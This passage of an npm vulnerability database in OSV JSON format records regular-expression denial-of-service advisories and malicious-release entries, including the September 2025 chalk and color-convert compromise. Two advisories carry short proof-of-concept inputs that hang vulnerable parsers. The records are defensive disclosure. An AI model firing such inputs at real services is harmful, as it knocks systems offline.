Date.now();\n var attack_str = \"\\u001B[\"+\";\".repeat(i*10000);\n ansiRegex().test(attack_str)\n var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\n}\n```\nThe ReDOS is mainly due to the sub-patterns `[[\\\\]()#;?]*` and `(?:;[-a-zA-Z\\\\d\\\\/#\u0026.:=?%@~_]*)*`", "affected": [ { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json" } }, { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json" } }, { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json" } }, { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/issues/38#issuecomment-924086311" 
}, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/issues/38#issuecomment-925924774" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/commit/c3c0b3f2736b9c01feec0fef33980c43720dcde8" }, { "type": "WEB", "url": "https://app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908" }, { "type": "PACKAGE", "url": "https://github.com/chalk/ansi-regex" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/releases/tag/v6.0.1" }, { "type": "WEB", "url": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221014-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-697" ], "github_reviewed": true, "github_reviewed_at": "2021-09-20T18:56:22Z", "nvd_published_at": "2021-09-17T07:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46966", "published": "2025-09-08T17:18:30Z", "modified": "2025-09-12T01:13:34Z", "aliases": [ "GHSA-jvhh-2m83-6w29" ], "summary": "Malicious code in ansi-regex (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (2777701ac1bf8726f2ea353b404c7d765ea3eb7bf0506207db828590ade1bf6e)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. 
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "versions": [ "6.2.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ansi-regex/MAL-2025-46966.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-jvhh-2m83-6w29" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-jvhh-2m83-6w29", "import_time": "2025-09-09T00:35:48.413747424Z", "modified_time": "2025-09-08T18:22:01Z", "sha256": "2777701ac1bf8726f2ea353b404c7d765ea3eb7bf0506207db828590ade1bf6e", "source": "ghsa-malware", "versions": [ "6.2.1" ] }, { "id": "GHSA-jvhh-2m83-6w29", "import_time": "2025-09-10T00:34:05.227213566Z", "modified_time": "2025-09-08T18:22:01Z", "sha256": "fd7ef224c32477d1ab8ba30a6d1a52e86d5c304753cdc3ae4bb69328e529bf8c", "source": "ghsa-malware", "versions": [ 
"6.2.1" ] }, { "id": "GHSA-jvhh-2m83-6w29", "import_time": "2025-09-11T00:34:35.47387599Z", "modified_time": "2025-09-10T17:56:02Z", "sha256": "0b61367c5dd8ed0ce2f849066960f18ee8861dc062dd4b8ee645a8a25fb7b8a7", "source": "ghsa-malware", "versions": [ "6.2.1" ] }, { "id": "GHSA-jvhh-2m83-6w29", "import_time": "2025-09-12T00:33:58.084580721Z", "modified_time": "2025-09-10T17:56:02Z", "sha256": "30d6b7a25ab660d87db43cd6b59c0a62eb3bdd66f3bba12a3374676105921d2d", "source": "ghsa-malware", "versions": [ "6.2.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46967", "published": "2025-09-08T17:07:44Z", "modified": "2025-09-12T01:13:34Z", "aliases": [ "GHSA-p5rr-crjh-x7gr" ], "summary": "Malicious code in ansi-styles (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (f82dc187071d265457effc48cb50c7ac209143e5da1a502a633a1c35b88aac67)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. 
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "ansi-styles", "ecosystem": "npm", "purl": "pkg:npm/ansi-styles" }, "versions": [ "6.2.2" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ansi-styles/MAL-2025-46967.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-p5rr-crjh-x7gr" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-p5rr-crjh-x7gr", "import_time": "2025-09-09T00:35:48.416514611Z", "modified_time": "2025-09-08T18:23:38Z", "sha256": "f82dc187071d265457effc48cb50c7ac209143e5da1a502a633a1c35b88aac67", "source": "ghsa-malware", "versions": [ "6.2.2" ] }, { "id": "GHSA-p5rr-crjh-x7gr", "import_time": "2025-09-10T00:34:05.231930273Z", "modified_time": "2025-09-08T18:23:38Z", "sha256": "3fa94453bd8bd98849aa59804994125d406c772d6f2e5653e8fe1325bed56aa8", "source": "ghsa-malware", "versions": [ 
"6.2.2" ] }, { "id": "GHSA-p5rr-crjh-x7gr", "import_time": "2025-09-11T00:34:35.480419354Z", "modified_time": "2025-09-10T17:52:23Z", "sha256": "c19c5617faf7e2a6e818e2f53e125cf5ce6f045a959ac86cd9343d267503c16a", "source": "ghsa-malware", "versions": [ "6.2.2" ] }, { "id": "GHSA-p5rr-crjh-x7gr", "import_time": "2025-09-12T00:33:58.092782064Z", "modified_time": "2025-09-10T17:52:23Z", "sha256": "a11059eb0365e0623522503424e1528b796670bf5013d28f4450b8082e5f1d8c", "source": "ghsa-malware", "versions": [ "6.2.2" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-832h-xg76-4gv6", "published": "2018-01-29T15:50:46Z", "modified": "2023-11-08T03:59:15.193726Z", "aliases": [ "CVE-2017-18077" ], "summary": "ReDoS in brace-expansion", "details": "Affected versions of `brace-expansion` are vulnerable to a regular expression denial of service condition.\n\n## Proof of Concept\n\n```\nvar expand = require('brace-expansion');\nexpand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\\n}');\n```\n\n\n## Recommendation\n\nUpdate to version 1.1.7 or later.", "affected": [ { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-832h-xg76-4gv6/GHSA-832h-xg76-4gv6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18077" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/issues/33" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/pull/35" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/pull/35/commits/b13381281cead487cbdbfd6a69fb097ea5e456c3" }, { 
"type": "WEB", "url": "https://bugs.debian.org/862712" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-832h-xg76-4gv6" }, { "type": "PACKAGE", "url": "https://github.com/juliangruber/brace-expansion" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/338" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:24:01Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v6h2-p8h4-qcjw", "published": "2025-06-09T21:30:51Z", "modified": "2025-06-11T20:54:10Z", "aliases": [ "CVE-2025-5889" ], "related": [ "CGA-48f6-2xrx-cxvw", "CGA-53f7-rx58-5rx6", "CGA-5489-g42r-jj95", "CGA-6q97-x38p-2v36", "CGA-8v3m-9726-pcqj", "CGA-9w98-92pm-h3wg", "CGA-gwp3-55v6-p25f", "CGA-hvx5-j33w-wf72", "CGA-jq8h-hpf9-qxxv", "CGA-jv3c-567r-7fr7", "CGA-mvmv-c4pf-vgpr", "CGA-p2f9-h939-jv5f", "CGA-vr9h-m8qm-5mj9", "CGA-x49c-f2g9-2gqg", "CGA-x9mj-gpvv-mx29", "CGA-xc8g-m7h6-2rp6", "CGA-xqvv-5w52-gqqq" ], "summary": "brace-expansion Regular Expression Denial of Service vulnerability", "details": "A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. Affected by this issue is the function expand of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 and 4.0.1 is able to address this issue. The name of the patch is `a5b98a4f30d7813266b221435e1eaaf25a1b0ac5`. 
It is recommended to upgrade the affected component.", "affected": [ { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.2" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v6h2-p8h4-qcjw/GHSA-v6h2-p8h4-qcjw.json" } }, { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.12" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.11", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v6h2-p8h4-qcjw/GHSA-v6h2-p8h4-qcjw.json" } }, { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v6h2-p8h4-qcjw/GHSA-v6h2-p8h4-qcjw.json" } }, { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.1" } ] } ], "versions": [ "4.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v6h2-p8h4-qcjw/GHSA-v6h2-p8h4-qcjw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5889" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/pull/65/commits/a5b98a4f30d7813266b221435e1eaaf25a1b0ac5" }, { "type": "WEB", "url": 
"https://github.com/juliangruber/brace-expansion/commit/0b6a9781e18e9d2769bb2931f4856d1360243ed2" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/commit/15f9b3c75ebf5988198241fecaebdc45eff28a9f" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/commit/36603d5f3599a37af9e85eda30acd7d28599c36e" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217" }, { "type": "WEB", "url": "https://gist.github.com/mmmsssttt404/37a40ce7d6e5ca604858fe30814d9466" }, { "type": "PACKAGE", "url": "https://github.com/juliangruber/brace-expansion" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.311660" }, { "type": "WEB", "url": "https://vuldb.com/?id.311660" }, { "type": "WEB", "url": "https://vuldb.com/?submit.585717" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2025-06-10T22:51:59Z", "nvd_published_at": "2025-06-09T19:15:25Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cwfw-4gq5-mrqx", "published": "2022-01-06T20:42:03Z", "modified": "2023-11-08T03:59:45.345388Z", "aliases": [ "CVE-2018-1109" ], "summary": "Regular Expression Denial of Service (ReDoS) in braces", "details": "A vulnerability was found in Braces versions prior to 2.3.1. 
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.", "affected": [ { "package": { "name": "braces", "ecosystem": "npm", "purl": "pkg:npm/braces" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-cwfw-4gq5-mrqx/GHSA-cwfw-4gq5-mrqx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1109" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/commit/abdafb0cae1e0c00f184abbadc692f4eaa98f451" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1547272" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:braces:20180219" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-03-31T21:35:00Z", "nvd_published_at": "2021-03-30T02:15:00Z", "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-g95f-p29q-9xw4", "published": "2019-06-06T15:30:30Z", "modified": "2021-08-04T21:35:07Z", "summary": "Regular Expression Denial of Service in braces", "details": "Versions of `braces` prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. 
This can cause the application to be unresponsive leading to Denial of Service.\n\n\n## Recommendation\n\nUpgrade to version 2.3.1 or higher.", "affected": [ { "package": { "name": "braces", "ecosystem": "npm", "purl": "pkg:npm/braces" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-g95f-p29q-9xw4/GHSA-g95f-p29q-9xw4.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/micromatch/braces/commit/abdafb0cae1e0c00f184abbadc692f4eaa98f451" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:braces:20180219" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/786" } ], "database_specific": { "cwe_ids": [ "CWE-185", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-06T09:40:51Z", "nvd_published_at": null, "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-grv7-fg5c-xmjg", "published": "2024-05-14T18:30:54Z", "modified": "2024-07-15T22:12:28.795792Z", "aliases": [ "CVE-2024-4068" ], "related": [ "CGA-g3x5-7mr7-wr8m", "CGA-hq78-8245-675v", "CGA-jrqh-c82g-rxvm", "CGA-p4gw-wx75-2mg4", "CGA-w95g-rrw2-66h4", "CGA-wr9w-hw24-rqg5" ], "summary": "Uncontrolled resource consumption in braces", "details": "The NPM package `braces` fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. 
Eventually, the JavaScript heap limit is reached, and the program will crash.\n", "affected": [ { "package": { "name": "braces", "ecosystem": "npm", "purl": "pkg:npm/braces" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-grv7-fg5c-xmjg/GHSA-grv7-fg5c-xmjg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4068" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/issues/35" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/pull/37" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/pull/40" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff" }, { "type": "WEB", "url": "https://devhub.checkmarx.com/cve-details/CVE-2024-4068" }, { "type": "PACKAGE", "url": "https://github.com/micromatch/braces" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/blob/98414f9f1fabe021736e26836d8306d5de747e0d/lib/parse.js#L308" } ], "database_specific": { "cwe_ids": [ "CWE-1050", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-06-10T20:17:26Z", "nvd_published_at": "2024-05-14T15:42:48Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w8qv-6jwh-64r5", "published": "2021-05-24T19:52:40Z", "modified": "2025-01-14T08:57:17.283480Z", "aliases": [ "CVE-2021-23364" ], "summary": "Regular Expression Denial of Service in browserslist", "details": "The package browserslist from 4.0.0 and before 4.16.5 are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries.", "affected": [ { "package": { "name": "browserslist", "ecosystem": "npm", "purl": "pkg:npm/browserslist" }, "ranges": [ { "type": "SEMVER", 
"events": [ { "introduced": "4.0.0" }, { "fixed": "4.16.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-w8qv-6jwh-64r5/GHSA-w8qv-6jwh-64r5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23364" }, { "type": "WEB", "url": "https://github.com/browserslist/browserslist/pull/593" }, { "type": "WEB", "url": "https://github.com/browserslist/browserslist/commit/c091916910dfe0b5fd61caad96083c6709b02d98" }, { "type": "WEB", "url": "https://github.com/browserslist/browserslist/blob/e82f32d1d4100d6bc79ea0b6b6a2d281a561e33c/index.js%23L472-L474" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1277182" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-BROWSERSLIST-1090194" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-20T22:03:36Z", "nvd_published_at": "2021-04-28T16:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46969", "published": "2025-09-08T17:11:19Z", "modified": "2025-09-12T01:13:34Z", "aliases": [ "GHSA-2v46-p5h4-248w" ], "summary": "Malicious code in chalk (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (985b6546ed08c8482326a4819faec318c27c1f6d7518acdf384d5f5a8c1453aa)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. 
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "chalk", "ecosystem": "npm", "purl": "pkg:npm/chalk" }, "versions": [ "5.6.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk/MAL-2025-46969.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2v46-p5h4-248w" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-2v46-p5h4-248w", "import_time": "2025-09-09T00:35:48.404674353Z", "modified_time": "2025-09-08T18:23:16Z", "sha256": "985b6546ed08c8482326a4819faec318c27c1f6d7518acdf384d5f5a8c1453aa", "source": "ghsa-malware", "versions": [ "5.6.1" ] }, { "id": "GHSA-2v46-p5h4-248w", "import_time": "2025-09-10T00:34:05.214580215Z", "modified_time": "2025-09-08T18:23:16Z", "sha256": "9e4e6ffb9078f031d148a99152d1a63bffe9c267f969ac88d6d9b355cd8d211c", "source": "ghsa-malware", "versions": [ "5.6.1" ] }, { 
"id": "GHSA-2v46-p5h4-248w", "import_time": "2025-09-11T00:34:35.448176777Z", "modified_time": "2025-09-10T17:52:52Z", "sha256": "64c35cc6f93b797f929d31b27a664a0a23481218c1ed47a374c7d38ccf30a663", "source": "ghsa-malware", "versions": [ "5.6.1" ] }, { "id": "GHSA-2v46-p5h4-248w", "import_time": "2025-09-12T00:33:58.009713106Z", "modified_time": "2025-09-10T17:52:52Z", "sha256": "51098385745159b51bf05a6f6a1082961f4598d6f9ae81f34430ecbb9c9faffb", "source": "ghsa-malware", "versions": [ "5.6.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wxhq-pm8v-cw75", "published": "2019-06-05T20:50:16Z", "modified": "2020-08-31T18:35:40Z", "summary": "Regular Expression Denial of Service in clean-css", "details": "Versions of `clean-css` prior to 4.1.11 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. 
This can cause the application to be unresponsive leading to Denial of Service.\n\n\n## Recommendation\n\nUpgrade to version 4.1.11 or higher.", "affected": [ { "package": { "name": "clean-css", "ecosystem": "npm", "purl": "pkg:npm/clean-css" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.1.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-wxhq-pm8v-cw75/GHSA-wxhq-pm8v-cw75.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jakubpawlowicz/clean-css/commit/2929bafbf8cdf7dccb24e0949c70833764fa87e3" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/785" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2019-06-05T20:49:47Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-pxx3-g568-hxr4", "published": "2025-09-15T23:32:36Z", "modified": "2025-09-16T06:44:36.975424Z", "aliases": [ "CVE-2025-59162", "GHSA-ch7m-m9rf-8gvv", "MAL-2025-46971" ], "summary": "color-convert@3.1.1 contains malware after npm account takeover", "details": "### Impact\nOn 8 September 2025, the npm publishing account for `color-convert` was taken over after a phishing attack. Version `3.1.1` was published, functionally identical to the previous patch version, but with a malware payload added attempting to redirect cryptocurrency transactions to the attacker's own addresses from within browser environments.\n\nLocal environments, server environments, command line applications, etc. are not affected. If the package was used in a browser context (e.g. a direct `\u003cscript\u003e` inclusion, or via a bundling tool such as Babel, Rollup, Vite, Next.js, etc.) there is a chance the malware still exists and such bundles will need to be rebuilt.\n\nThe malware seemingly only targets cryptocurrency transactions and wallets such as MetaMask. 
See references below for more information on the payload.\n\n### Patches\nnpm removed the offending package from the registry over the course of the day on 8 September, preventing further downloads from npm proper.\n\nOn 13 September, the package owner published new patch versions to help cache-bust those using private registries who might still have the compromised version cached. This version is functionally identical to the previously known-good version, published as a patch version bump above the compromised version.\n\nUsers should update to the latest patch version, completely remove their `node_modules` directory, clean their package manager's global cache, and rebuild any browser bundles from scratch.\n\nThose operating private registries or registry mirrors should purge the offending versions from any caches.\n\n### References\n- https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised\n- https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack\n- https://www.ox.security/blog/npm-packages-compromised/\n\n### Point of Contact\nIn the event suspicious behavior is still observed for the package listed in this security advisory after performing all of the above cleaning operations (see _Patches_ above), please reach out via one of the following channels of communication:\n\n- Bluesky, package owner: https://bsky.app/profile/bad-at-computer.bsky.social\n- `debug` repository, tracking issue (applies to all packages affected in the breach): https://github.com/debug-js/debug/issues/1005", "affected": [ { "package": { "name": "color-convert", "ecosystem": "npm", "purl": "pkg:npm/color-convert" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.1.1" }, { "fixed": "3.1.2" } ] } ], "versions": [ "3.1.1" ], 